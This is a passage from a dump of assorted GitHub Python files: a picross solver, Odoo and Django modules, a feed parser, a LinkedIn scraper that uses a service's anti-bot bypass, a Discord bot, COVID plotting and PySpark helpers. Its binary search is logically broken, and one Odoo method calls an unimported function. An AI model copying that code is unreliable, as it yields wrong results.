row[left:right] != [fill_color] * width:\n dirty = True\n row[left:right] = [fill_color] * width\n if left > 1:\n if row[left-1] != x_color:\n dirty = True\n row[left-1] = x_color\n if right < len(row) - 2:\n if row[right] != x_color:\n dirty = True\n row[right] = x_color\n elif clue * 2 > width:\n e = width - clue\n new_fill = [fill_color] * (right - left - 2*e)\n if row[left+e:right-e] != new_fill:\n dirty = True\n row[left+e:right-e] = new_fill\n\n try:\n left = next(i for i, x in enumerate(row) if x != x_color)\n except StopIteration:\n pass\n else:\n if row[left:clues[0]] == [fill_color] * clues[0]:\n internal, internal_dirty = self.solveRow(row[left+clues[0]:], clues[1:], fill_color)\n dirty |= internal_dirty\n return row[:left+clues[0]] + internal, dirty\n\n try:\n right = len(row) - next(i for i, x in enumerate(reversed(row)) if x != x_color)\n except StopIteration:\n pass\n else:\n if row[right-clues[-1]:right] == [fill_color] * clues[-1]:\n internal, internal_dirty = self.solveRow(row[:right-clues[-1]], clues[:-1], fill_color)\n dirty |= internal_dirty\n return internal + row[right-clues[-1]:], dirty\n\n for i in range(len(clues)):\n helper(i)\n\n return row, dirty\n\n @staticmethod\n def parse_clues(filename):\n clues = []\n with open(filename, 'r') as f:\n for line in f:\n clues.append(list(map(int, line.strip().split())))\n return clues\n\n @staticmethod\n def dist(x, y):\n return math.sqrt((x[0]-y[0])**2 + (x[1]-y[1])**2)\n","repo_name":"Carthage96/InversePicross","sub_path":"Grid.py","file_name":"Grid.py","file_ext":"py","file_size_in_byte":7334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29510145861","text":"# -*- coding: utf-8 -*-\r\n##############################################################################\r\n#\r\n# Copyright (C) 2016 Pambudi Satria ().\r\n# @author Pambudi Satria \r\n#\r\n# This program is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU Affero General Public License as\r\n# published by the Free Software Foundation, either version 3 of the\r\n# License, or (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU Affero General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU Affero General Public License\r\n# along with this program. If not, see .\r\n#\r\n##############################################################################\r\n\r\nfrom openerp import fields, models, api\r\n\r\nclass ConsignmentServiceType(models.Model):\r\n _name = \"consignment.service.type\"\r\n _inherit = ['mail.thread']\r\n _description = 'Consignment Service Type'\r\n _order = 'code, name asc'\r\n\r\n name = fields.Char('Service Name', required=True, track_visibility='onchange')\r\n code = fields.Char('Code', required=True, select=True, track_visibility='onchange', copy=False)\r\n active = fields.Boolean(default=True, track_visibility='onchange')\r\n\r\n _sql_constraints = [\r\n ('code_unique', 'UNIQUE(code)', 'Code must be unique'),\r\n ]\r\n\r\n @api.returns('self', lambda value: value.id)\r\n @api.multi\r\n def copy(self, defaults=None):\r\n if not defaults:\r\n defaults = {}\r\n defaults.update({\r\n 'name': _(\"%s (copy)\") % self.name,\r\n 'code': _(\"%s (copy)\") % self.code,\r\n })\r\n return super(ConsignmentServiceType, self).copy(defaults)\r\n\r\n @api.multi\r\n def name_get(self):\r\n result = []\r\n for rec in self:\r\n name_get = rec.name\r\n if self._context.get('show_code'):\r\n name_get = rec.code\r\n result.append((rec.id, \"%s\" % (name_get)))\r\n return result\r\n\r\n @api.model\r\n def name_search(self, name, args=None, operator='ilike', limit=100):\r\n args = args or []\r\n recs = self.browse()\r\n if name:\r\n recs = self.search([('code', '=', name)] + args, limit=limit)\r\n if not recs:\r\n recs = self.search([('name', operator, name)] + args, limit=limit)\r\n return recs.name_get()\r\n\r\nclass account_invoice_line(models.Model):\r\n _inherit = \"account.invoice.line\"\r\n\r\n layanan = fields.Many2one('consignment.service.type', string='Service Type')","repo_name":"sumihai-tekindo/account_sicepat","sub_path":"sicepat_erp/invoice_line_service_type/invoice_line_service_type.py","file_name":"invoice_line_service_type.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"16495159302","text":"\"\"\":mod:`libearth.parser.autodiscovery` --- Autodiscovery\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nThis module provides functions to autodiscovery feed url in document.\n\n\"\"\"\ntry:\n import HTMLParser\nexcept ImportError:\n import html.parser as HTMLParser\nimport collections\nimport logging\nimport re\ntry:\n import urlparse\nexcept ImportError:\n import urllib.parse as urlparse\n\nfrom ..compat import text\nfrom ..compat.etree import fromstring\nfrom .atom import parse_atom\nfrom .rss1 import parse_rss1\nfrom .rss2 import parse_rss2\nfrom .util import normalize_xml_encoding\n\n\n__all__ = ('ATOM_TYPE', 'RSS_TYPE', 'TYPE_TABLE', 'AutoDiscovery', 'FeedLink',\n 'FeedUrlNotFoundError', 'autodiscovery', 'get_format')\n\n\n#: (:class:`str`) The MIME type of RSS 2.0 format\n#: (:mimetype:`application/rss+xml`).\nRSS_TYPE = 'application/rss+xml'\n\n#: (:class:`str`) The MIME type of Atom format\n#: (:mimetype:`application/atom+xml`).\nATOM_TYPE = 'application/atom+xml'\n\n#: (:class:`collections.Set`) The set of supported feed MIME types.\n#:\n#: .. versionadded:: 0.3.0\nFEED_TYPES = frozenset([RSS_TYPE, ATOM_TYPE])\n\n#: (:class:`collections.Mapping`) The mapping table of feed types\nTYPE_TABLE = {parse_atom: ATOM_TYPE, parse_rss2: RSS_TYPE, parse_rss1: RSS_TYPE}\n\n#: Namedtuple which is a pair of ``type` and ``url``\nFeedLink = collections.namedtuple('FeedLink', 'type url')\n\n\ndef autodiscovery(document, url):\n \"\"\"If the given url refers an actual feed, it returns the given url\n without any change.\n\n If the given url is a url of an ordinary web page\n (i.e. :mimetype:`text/html`), it finds the urls of the corresponding feed.\n It returns feed urls in feed types' lexicographical order.\n\n If autodiscovery failed, it raise :exc:`FeedUrlNotFoundError`.\n\n :param document: html, or xml strings\n :type document: :class:`str`\n :param url: the url used to retrieve the ``document``.\n if feed url is in html and represented in relative url,\n it will be rebuilt on top of the ``url``\n :type url: :class:`str`\n :returns: list of :class:`FeedLink` objects\n :rtype: :class:`collections.MutableSequence`\n\n \"\"\"\n document = text(document)\n document_type = get_format(document)\n if document_type is None:\n parser = AutoDiscovery()\n feed_links, _ = parser.find(document)\n if not feed_links:\n raise FeedUrlNotFoundError('Cannot find feed url')\n for link in feed_links:\n if link.url.startswith('/'):\n absolute_url = urlparse.urljoin(url, link.url)\n feed_links[feed_links.index(link)] = \\\n FeedLink(link.type, absolute_url)\n return feed_links\n else:\n return [FeedLink(TYPE_TABLE[document_type], url)]\n\n\nclass AutoDiscovery(HTMLParser.HTMLParser):\n \"\"\"Parse the given HTML and try finding the actual feed urls from it.\n\n .. versionchanged:: 0.3.0\n It became to find icon links as well, and :meth:`find_feed_url()`\n method (that returned only feed links) was gone, instead :meth:`find()`\n (that return a pair of feed links and icon links) was introduced.\n\n \"\"\"\n\n LINK_PATTERN = re.compile(r'''rel\\s?=\\s?(?:'|\")?([^'\">]+)''')\n LINK_HREF_PATTERN = re.compile(r'''href\\s?=\\s?(?:'|\")?([^'\"\\s>]+)''')\n LINK_TYPE_PATTERN = re.compile(r'''type\\s?=\\s?(?:'|\")?([^'\"\\s>]+)''')\n\n def __init__(self):\n HTMLParser.HTMLParser.__init__(self)\n self.feed_links = []\n self.icon_links = []\n\n def handle_starttag(self, tag, attrs):\n attrs = dict(attrs)\n if not (tag == 'link' and 'rel' in attrs and 'href' in attrs):\n return\n if attrs['rel'] == 'alternate' and 'type' in attrs and \\\n attrs['type'] in FEED_TYPES:\n self.feed_links.append(FeedLink(attrs['type'], attrs['href']))\n elif 'icon' in attrs['rel'].split():\n self.icon_links.append(attrs['href'])\n\n def find(self, document):\n document = text(document)\n match = re.match('.+', document)\n if match:\n head = match.group(0)\n else:\n head = document\n chunks = re.findall('[^>]*(?:>|$)', head)\n for chunk in chunks:\n try:\n self.feed(chunk)\n except Exception:\n self.find_link_with_regex(chunk)\n self.feed_links = sorted(self.feed_links, key=lambda link: link.type)\n return self.feed_links, self.icon_links\n\n def find_link_with_regex(self, chunk):\n match = self.LINK_PATTERN.search(chunk)\n if not match:\n return\n href_match = self.LINK_HREF_PATTERN.search(chunk)\n if not href_match:\n return\n rels = match.group(1).split()\n href = href_match.group(1)\n if 'alternate' in rels:\n type_match = self.LINK_TYPE_PATTERN.search(chunk)\n if type_match:\n type_ = type_match.group(1)\n if type_ in FEED_TYPES:\n self.feed_links.append(FeedLink(type_, href))\n if 'icon' in rels:\n self.icon_links.append(href)\n\n\nclass FeedUrlNotFoundError(Exception):\n \"\"\"Exception raised when feed url cannot be found in html.\"\"\"\n\n def __init__(self, msg):\n self.msg = msg\n\n\ndef get_format(document):\n \"\"\"Guess the syndication format of an arbitrary ``document``.\n\n :param document: document string to guess\n :type document: :class:`str`, :class:`bytes`\n :returns: the function possible to parse the given ``document``\n :rtype: :class:`collections.Callable`\n\n .. versionchanged:: 0.2.0\n The function was in :mod:`libearth.parser.heuristic` module (which is\n removed now) before 0.2.0, but now it's moved to\n :mod:`libearth.parser.autodiscovery`.\n\n \"\"\"\n document = normalize_xml_encoding(document)\n try:\n root = fromstring(document)\n except Exception as e:\n logger = logging.getLogger(__name__ + '.get_format')\n logger.debug('document = %r', document)\n logger.warning(e, exc_info=True)\n return None\n if root.tag in ('{http://www.w3.org/2005/Atom}feed',\n '{http://purl.org/atom/ns#}feed'):\n return parse_atom\n elif root.tag == '{http://www.w3.org/1999/02/22-rdf-syntax-ns#}RDF':\n return parse_rss1\n elif root.tag == 'rss':\n return parse_rss2\n else:\n return None\n","repo_name":"earthreader/libearth","sub_path":"libearth/parser/autodiscovery.py","file_name":"autodiscovery.py","file_ext":"py","file_size_in_byte":6439,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"52"} +{"seq_id":"13326040798","text":"import os\nimport pandas as pd\nfrom scrapfly import ScrapflyClient, ScrapeConfig\nfrom bs4 import BeautifulSoup\nfrom datetime import date, datetime\nfrom tqdm import tqdm\nfrom dotenv import load_dotenv\nfrom datetime import date\n\nload_dotenv()\n\nSCRAPFLY_API_KEY = os.getenv(\"SCRAPFLY_API_KEY\")\n\ndef scrapfly_request(link):\n \n scrapfly = ScrapflyClient(key=SCRAPFLY_API_KEY)\n result = scrapfly.scrape(ScrapeConfig(\n url = link,\n country = \"gb\" \n ))\n \n return result.content\n\ndef linkedin_jobs_num(link):\n soup = BeautifulSoup(scrapfly_request(link),features=\"lxml\")\n try:\n jobs_num = int(soup.find(class_=\"results-context-header__job-count\").getText().replace('+','').replace(',',''))\n except:\n jobs_num = 25\n jobs_data = scrap_linkedin_jobs_data(soup)\n return jobs_num,jobs_data\n\ndef scrap_linkedin_jobs_data(soup):\n jobs = soup.find_all('li')\n jobs_data = []\n for job in jobs:\n try:\n job_title = job.find('a').getText().replace('\\n','').strip()\n job_link = job.find('a')['href']\n location = job.find(class_=\"job-search-card__location\").getText().replace('\\n','').strip()\n try:\n company = job.find(class_=\"hidden-nested-link\").getText().replace('\\n','').strip()\n except:\n company = job.find(class_=\"base-search-card__subtitle\").getText().replace('\\n','').strip()\n posted = job.find('time')['datetime']\n days = (datetime.strptime(posted, \"%Y-%m-%d\").date()-date.today()).days\n if days<-2:\n continue\n job_data = {'posted':posted,'job title':job_title,'company working':company,'location working':location,'link':job_link}\n jobs_data.append(job_data)\n except:\n pass\n return jobs_data\n\ndef scrap_linkedin_api(link,page_num):\n\n location = link.split('&position')[0].split('location=')[1].split('geoId=')[0]\n geoId = link.split('&position')[0].split('location=')[1].split('geoId=')[1]\n\n url = f'https://www.linkedin.com/jobs-guest/jobs/api/seeMoreJobPostings/search?keywords=&location={location}locationId=&geoId={geoId}&position=1&pageNum=1&start={page_num*25}'\n\n headers = {\n 'authority': 'www.linkedin.com',\n 'referer': link\n }\n \n scrapfly = ScrapflyClient(key=SCRAPFLY_API_KEY)\n result = scrapfly.scrape(ScrapeConfig(\n url = url,\n headers = headers,\n asp = True,\n country = \"gb\",\n retry=True))\n \n return result.content\n\ndef linkedin_scrap(linkedin_link):\n if not os.path.exists(\"output/linkedin/data_by_location\"):\n os.makedirs(\"output/linkedin/data_by_location\")\n\n if not os.path.exists(\"output/linkedin/full_data\"):\n os.makedirs(\"output/linkedin/full_data\")\n jobs_num,job_data = linkedin_jobs_num(linkedin_link['links'])\n for page in tqdm(range(1,jobs_num//25)):\n try:\n soup = BeautifulSoup(scrap_linkedin_api(linkedin_link['links'],page),features=\"lxml\")\n job_data.extend(scrap_linkedin_jobs_data(soup))\n except:\n if page==20:\n break\n df = pd.DataFrame(job_data)\n df.to_csv(f'output/linkedin/data_by_location/linkedin_output_{linkedin_link[\"locations\"]}_{date.today()}.csv',index=False)\n\ndef merge_data():\n folder_path = 'output/linkedin/data_by_location'\n\n csv_files = [file for file in os.listdir(folder_path) if file.endswith(f'_{date.today()}.csv')]\n\n new_folder_path = 'output\\\\linkedin\\\\full_data'\n\n if len(csv_files) == 0:\n print(\"No CSV files found in the folder.\")\n dataframes = []\n\n for file in csv_files:\n try:\n file_path = os.path.join(folder_path, file)\n df = pd.read_csv(file_path)\n dataframes.append(df)\n\n merged_data = pd.concat(dataframes, ignore_index=True)\n merged_file_path = os.path.join(new_folder_path, f'linkedin_full_data_{date.today()}.csv')\n merged_data.to_csv(merged_file_path, index=False)\n except:\n pass\n\n","repo_name":"zakaria47fs/jobs-scrapers","sub_path":"utils/utils_linkedin.py","file_name":"utils_linkedin.py","file_ext":"py","file_size_in_byte":4053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4782089695","text":"import discord\nfrom discord.ext import commands, tasks\nfrom random import choice\nfrom music import Music\nfrom mods import MODs\nimport os\n\nclient = commands.Bot(command_prefix=commands.when_mentioned_or(\">\"), description='Relatively simple music bot example')\nclient.remove_command('help')\nstatus = ['Listening to >help', 'Singing music 🎙', '🍩 Eating Doughnut']\n\n\ndef colour():\n l = [\n 1752220, 3066993, 3447003, 10181046, 15844367,\n 15105570, 15158332, 3426654, 1146986, 2067276,\n 2123412, 7419530, 12745742, 11027200, 10038562,\n 2899536, 16580705, 12320855\n ]\n return choice(l)\n\n\nclass starting(commands.Cog):\n def __init__(self, client):\n self.client = client\n\n @commands.command()\n async def ping(self, ctx):\n l = client.latency * 1000\n r = int(l)\n em = discord.Embed(\n title = \"Pong!\",\n description = f\"**Latency: {r}ms**\",\n colour = colour()\n )\n await ctx.send(embed=em)\n\n @commands.command()\n async def invite(self, ctx):\n em = discord.Embed(\n title= \"Invite me you your server!!!\",\n colour = colour()\n )\n em.add_field(name=\"click to invite me\", value=\"https://discord.com/api/oauth2/authorize?client_id=819233568621854760&permissions=4294967287&scope=bot\")\n await ctx.send(embed=em)\n\n@client.event\nasync def on_ready():\n\tchange_status.start()\n\tprint(\"The Bot is online!\")\n\n\n@tasks.loop(seconds=10)\nasync def change_status():\n\tawait client.change_presence(activity=discord.Game(choice(status)))\n\n\n@client.event\nasync def on_command_error(ctx, error):\n\tawait ctx.send(f\"```{error}```\")\n\n\nclient.add_cog(Music(client))\nclient.add_cog(MODs(client))\nclient.add_cog(starting(client))\n\nclient.run(os.environ['token'])\n","repo_name":"aum-singhal/musify","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"4932390760","text":"## This function breaks apart the user input and assigns the coordinate pairs to a dictionary (data structure).\n##If there are inconsistencies in the user input (for example a missing y value)the function prints an exception message.\\n\n# Author: Sarthak Desai\\n\n#@param data is the list of co-ordinate pairs inputted by the user.\n#\ndef clean_data(data):\n\t\n\ttry:\n\t\tx=[ x[0] for x in data ]\n\t\ty=[ y[1] for y in data ]\n\texcept:\n\t\traise Exception(\"Inconsistent data\")\n\t\treturn\n\t\t\n\tmylist=[]\n\n\tchecktype(x, y)\n\t\n\tfor i in range (len(x)):\n\t\td = {\"x\": x[i], \"y\": y[i]}\n\t\tmylist.append(d)\n\treturn mylist\n\n\t\t\n## This function checks if the data input type is correct(i.e. integers or floats).\n#If data type is not correct function outputs an exception message.\\n\n# Author: Sarthak Desai\\n\n#@param x is a list of x values from all the co-ordinate pairs.\n#@param y is a list of y values from all the co-ordinate pairs.\n#\n\ndef checktype(x,y):\n\tfor value in x:\n\t\tif type (value) != int and type (value) != float:\n\t\t\traise Exception(\"Invalid input types in x\")\n\tfor value in y:\n\t\tif type (value) != int and type (value) != float:\n\t\t\traise Exception(\"Invalid input types in y\")\n\tcheckT=True\n\treturn\n\n\n\n\n\n","repo_name":"HatimRehman/xPycharts","sub_path":"src/BarChart/Points.py","file_name":"Points.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9163906019","text":"# evaluate random forest algorithm for classification\nimport os\n\nimport matplotlib.pyplot as plt\n\nfrom covid_data_play.common import *\n\nfrom covid_data_play.common import FEATURES_PLK_PATH, OUT_DIR, COUNTRIES_WITH_GOOD_ENOUGH_DATA\n\nif __name__ == '__main__':\n full_data = pd.read_pickle(FEATURES_PLK_PATH)\n\n # full_data = full_data[full_data['date'] >= '2020-04-01']\n\n countries_to_plot = COUNTRIES_WITH_GOOD_ENOUGH_DATA\n\n fig, axes = plt.subplots(nrows=len(countries_to_plot), ncols=4)\n\n def plot_smoothed_cfr(c, plot_title, subplot_row, subplot_col):\n data = full_data[full_data['location'] == c]\n data['cfr'] = data['owd_cfr_over_100_cases_only'] # data['cfr'].rolling(20).mean()\n data.plot(x='date', y=['cfr'], title=plot_title, ax=axes[subplot_row, subplot_col],\n ylim=(0, 10))\n\n\n def plot_biweekly_cases(c, plot_title, subplot_row, subplot_col):\n data = full_data[full_data['location'] == c]\n data.plot(x='date', y=['biweekly_cases_per_100k'], title=plot_title, ax=axes[subplot_row, subplot_col],\n ylim=(0, 3000))\n\n\n def plot_biweekly_deaths(c, plot_title, subplot_row, subplot_col):\n data = full_data[full_data['location'] == c]\n data.plot(x='date', y=['biweekly_deaths_per_100k'], title=plot_title, ax=axes[subplot_row, subplot_col],\n ylim=(0, 40))\n\n\n def plot_total_vax(c, plot_title, subplot_row, subplot_col):\n data = full_data[full_data['location'] == c]\n data.plot(x='date', y=['total_vaccinations_per_hundred'], title=plot_title, ax=axes[subplot_row, subplot_col],\n ylim=(0, 200))\n data.plot(x='date', y=['total_boosters_per_hundred'], title=plot_title, ax=axes[subplot_row, subplot_col],\n ylim=(0, 200))\n\n\n for cntr in countries_to_plot:\n plot_smoothed_cfr(cntr, cntr, countries_to_plot.index(cntr), 0)\n plot_biweekly_cases(cntr, '', countries_to_plot.index(cntr), 1)\n plot_biweekly_deaths(cntr, '', countries_to_plot.index(cntr), 2)\n plot_total_vax(cntr, '', countries_to_plot.index(cntr), 3)\n\n # plt.show()\n figure = plt.gcf()\n figure.set_size_inches(30, len(countries_to_plot)*4)\n plt.subplots_adjust(left=0.1,\n bottom=0.1,\n right=0.9,\n top=0.9,\n wspace=0.4,\n hspace=0.4)\n plt.savefig(f\"{OUT_DIR}/{os.path.basename(__file__).replace('.py', '')}.svg\")\n plt.savefig(f\"{OUT_DIR}/{os.path.basename(__file__).replace('.py', '')}.png\")\n #plt.show()\n","repo_name":"ockhamsrzr85/covid_data_exploration","sub_path":"covid_data_play/data_exploration/read_and_plot_example2.py","file_name":"read_and_plot_example2.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72541687845","text":"import os\nfrom wsgiref.util import FileWrapper\nfrom django.http import FileResponse, HttpResponse\nfrom django.shortcuts import render\nfrom .forms import UploadUrlForm\nfrom .utils import yt_download, delete_quotes\nfrom video_convertor.utils import convert_mp4_to_mp3\nfrom video_convertor.models import UploadedFile\n\n\ndef yt_url(request):\n if request.method == 'POST':\n form = UploadUrlForm(request.POST)\n button_action = request.POST.get('button_action')\n if form.is_valid():\n url = form.cleaned_data.get('url')\n file_name = yt_download(url)\n if button_action == 'action1':\n if os.path.exists(file_name):\n file = FileWrapper(open(f'{file_name}', 'rb'))\n response = HttpResponse(file, content_type='video/mp4')\n response['Content-Disposition'] = f'attachment; filename={delete_quotes(file_name)}'\n\n os.remove(file_name)\n\n return response\n else:\n return HttpResponse(\"File not found\", status=404)\n\n elif button_action == 'action2':\n convert_mp4_to_mp3(file_name)\n mp3_file = UploadedFile.objects.create(mp3_file='converted.mp3')\n mp3_filename = mp3_file.mp3_filename()\n\n mp3_path = os.path.join('media/final/', mp3_filename)\n mp3_file = open(mp3_path, 'rb')\n response = FileResponse(mp3_file)\n response['Content-Type'] = 'audio/mpeg'\n response['Content-Disposition'] = f'attachment; filename=\"{mp3_filename}\"'\n\n os.remove(f'media/final/{mp3_filename}')\n\n return response\n else:\n form = UploadUrlForm()\n\n return render(request, 'yt_download.html', {'form': form})","repo_name":"starzkeeper/improve_your_file","sub_path":"youtube_downloader/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1363586503","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n\n url(r'^$',views.hola, name='home'),\n # url(r'^POS/$',views.hola, name='home'),\n url(r'^consultaLista/$',views.simple_upload, name='consultaLista'),\n url(r'^consultaUnica/$',views.get_name, name='consultaUnica'),\n url(r'^masInformacion/$',views.masInformacion, name='masInformacion'),\n url(r'^descarga/$',views.descargaExcel, name='descarga'),\n # url(r'^hola/$',views.hola,name='hola'),\n # url(r'^elMejorBoton/',views.elMejorBoton),\n]","repo_name":"Ferced/POS-2019","sub_path":"polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"21408358306","text":"def pesquisa_binaria(list, target):\r\n primeiro = 0\r\n ultimo = len(list) - 1\r\n\r\n while primeiro <= ultimo:\r\n ponto_do_meio = (primeiro + ultimo)// 2\r\n if list[ponto_do_meio] == target:\r\n return ponto_do_meio\r\n elif list[ponto_do_meio] < primeiro:\r\n ultimo = ponto_do_meio + 1\r\n else:\r\n primeiro = ponto_do_meio - 1\r\n return None \r\n\r\n\r\ndef verificar(index):\r\n if index is not None:\r\n print(\"O número do índice é: \", index)\r\n else:\r\n print(\"O número do índice não existe\")\r\n \r\nnumeros = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\r\nresultado = pesquisa_binaria(numeros, 8)\r\n\r\nverificar(resultado)","repo_name":"Gabrielgui2218/FreeCodeCamp-Algoritmo","sub_path":"binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26604163073","text":"\"\"\"Performs spark transformation operations.\"\"\"\nimport logging\nfrom typing import Dict, List, Optional, Tuple, TypeVar\n\nfrom pyspark.sql import DataFrame, functions as F, types as T\nfrom pyspark.sql.utils import AnalysisException\n\nLOGGING = logging.getLogger(__name__)\nPREDICATE = Tuple[str, str, str]\nLOGICALPREDICATE = Tuple[PREDICATE, str, PREDICATE]\nPredicateType = TypeVar(\"T\", PREDICATE, LOGICALPREDICATE)\nA = TypeVar(\"A\", str, int, bool)\n\n\ndef select(dataframe: DataFrame, cols: List[Dict[str, str]]) -> DataFrame:\n \"\"\"Select columns mentioned in cols argument and apply renaming/casting transformations if any.\n\n :param list cols: list of columns\n\n **Columns**\n\n :param str col: name of the column\n :param bool add_new_column: add new column, default false\n :param str alias: set alias for column\n :param str cast: cast column to type\n :param str default_value: set the default value of the column\n\n If add_new_columns is true, add missing columns with None values.\n \"\"\"\n list_of_columns = []\n\n for col in cols:\n dataframe, column_name = _process_column(dataframe, **col)\n list_of_columns.append(column_name)\n\n return dataframe.select(*list_of_columns)\n\n\ndef explode(dataframe: DataFrame, col: str, new_col: str = None) -> DataFrame:\n \"\"\"Explode a list in a cell to many rows in the dataframe\n\n :param str col: name of the column to explode\n :param str new_col: name of the new column to explode to, could be exploded column\n \"\"\"\n tmp_new_col = new_col if new_col else col\n\n return dataframe.withColumn(tmp_new_col, F.explode(col))\n\n\ndef rename_column(dataframe: DataFrame, col: str, new_name: str) -> DataFrame:\n \"\"\"Return DF with the column renamed and with the columns in the same order.\n\n :param str col: name of the column\n :param str new_name: new name of the column\n \"\"\"\n _validate_column_exists(dataframe, col)\n\n return dataframe.withColumnRenamed(col, new_name)\n\n\ndef substring(\n dataframe: DataFrame, col: str, new_col: str, pos: int, length: int\n) -> DataFrame:\n \"\"\"Return DF with a column that is an substring of given column and with columns in the same order.\n\n :param str col: name of the column\n :param str new_col: type of the new column\n :param int pos: substring starts at pos\n :param int length: length of substring\n \"\"\"\n _validate_column_exists(dataframe, col)\n\n return dataframe.withColumn(new_col, F.substring(col, pos, length))\n\n\ndef split(dataframe: DataFrame, col: str, new_col: str, split_on: str) -> DataFrame:\n \"\"\"Return DF with a column that is the result of splitting a column on a given character\n\n :param str col: name of the column\n :param str new_col: type of the new column\n :param int split_on: split the string on this char\n\n Examples:\n\n ```\n SectionName:\n Type: transform::generic\n Input: InputBlock\n Properties:\n Functions:\n - split:\n col: name\n new_col: firstname\n split_on: ' '\n ```\n \"\"\"\n _validate_column_exists(dataframe, col)\n\n return dataframe.withColumn(new_col, F.split(F.col(col), split_on))\n\n\ndef get_item(dataframe: DataFrame, col: str, new_col: str, index: any) -> DataFrame:\n \"\"\"Return DF with a column that contains one item for an array\n\n :param str col: name of the column\n :param str new_col: type of the new column\n :param any index: the index key\n\n Examples:\n\n ```\n SectionName:\n Type: transform::generic\n Input: InputBlock\n Properties:\n Functions:\n - get_item:\n col: name\n new_col: firstname\n index: 2\n ```\n \"\"\"\n _validate_column_exists(dataframe, col)\n\n return dataframe.withColumn(new_col, F.col(col).getItem(index))\n\n\ndef get_json_object(\n dataframe: DataFrame, col: str, new_col: str, path: str\n) -> DataFrame:\n \"\"\"Return DF with a column that is a value extracted from a json object column.\n\n :param str col: name of the json column\n :param str new_col: type of the new column\n :param any path: the path key\n\n Examples:\n\n ```\n SectionName:\n Type: transform::generic\n Input: InputBlock\n Properties:\n Functions:\n - get_json_object:\n col: context\n new_col: context_type\n path: type\n ```\n \"\"\"\n _validate_column_exists(dataframe, col)\n\n return dataframe.withColumn(new_col, F.get_json_object(F.col(col), \"$.\" + path))\n\n\ndef cast_column(dataframe: DataFrame, col: str, new_type: T) -> DataFrame:\n \"\"\"Return DF with the column cast to new type and with the columns in the same order.\n\n :param str col: name of the column\n :param T new_type: type of the column\n \"\"\"\n _validate_column_exists(dataframe, col)\n\n return dataframe.withColumn(col, F.col(col).cast(new_type))\n\n\ndef join(\n left_df: DataFrame, right_df: DataFrame, cols: List[str], join_type=\"left\"\n) -> DataFrame:\n \"\"\"Return a joined DF.\n\n :param undefined TODO: unclear how this works\n \"\"\"\n return left_df.join(right_df, cols, join_type)\n\n\ndef union(left_df: DataFrame, right_df: DataFrame) -> DataFrame:\n \"\"\"Return union of DFs.\n\n :param undefined TODO: unclear how this works\n \"\"\"\n try:\n return left_df.union(right_df)\n except AnalysisException as exception:\n LOGGING.error(str(exception))\n raise ValueError(str(exception))\n\n\ndef where(dataframe: DataFrame, predicate: PredicateType) -> DataFrame:\n \"\"\"Apply where to DF and returns rows satifying the specified condition.\n\n Note: Column names with special characters like '.' and '-' must be escaped with ´ ´\n Example: ``payload.attributes.`plant-id` `` (escaping hyphen)\n\n :param PredicateType predicate: the predicate\n\n **PredicateType**\n\n PredicateType consists of a list with 3 string values.\n\n Examples:\n\n ```\n SectionName:\n Type: transform::generic\n Input: InputBlock\n Properties:\n Functions:\n - where:\n predicate: [DeviceName, '!=', 'null']\n ```\n \"\"\"\n try:\n return dataframe.where(_predicate_to_sql(predicate))\n except AnalysisException as analysis_exception:\n LOGGING.error(str(analysis_exception))\n raise ValueError(str(analysis_exception))\n\n\ndef filter_dataframe(dataframe: DataFrame, param: PredicateType) -> DataFrame:\n \"\"\"Apply filter to DF and filters out(removes) rows satifying the specified condition.\"\"\"\n return dataframe.subtract(where(dataframe, param))\n\n\ndef concat(\n dataframe: DataFrame, from_columns: List[str], to_column: str, delimiter: str = \"_\"\n) -> DataFrame:\n \"\"\"Concatenate columns with delimiter and return concatenated column\n\n :param list from_columns: list of column names\n :param str to_column: destination column\n :param str delimiter: the delimiter between each column, default `_`\n \"\"\"\n\n def cast_list_items_to_string(cols):\n return [F.col(col).cast(T.StringType()) for col in cols]\n\n def add_delimiter(lst, item):\n result = [F.lit(item)] * (len(lst) * 2 - 1)\n result[0::2] = lst\n return result\n\n processed_list = add_delimiter(cast_list_items_to_string(from_columns), delimiter)\n return dataframe.withColumn(to_column, F.concat(*processed_list))\n\n\ndef drop_duplicates(\n dataframe: DataFrame, columns: Optional[List[str]] = None\n) -> DataFrame:\n \"\"\"Drop duplicates in the dataframe\n\n :param list columns=: list of columns names to make unique, default takes all columns\n \"\"\"\n\n if columns:\n return (\n dataframe.select(F.concat_ws(\"-\", *columns).alias(\"temp\"), \"*\")\n .dropDuplicates([\"temp\"])\n .drop(\"temp\")\n )\n return dataframe.dropDuplicates()\n\n\ndef _predicate_to_sql(predicate: PredicateType, sql: str = \"\") -> str:\n \"\"\"Convert user predicate input to a valid SQL query string.\"\"\"\n 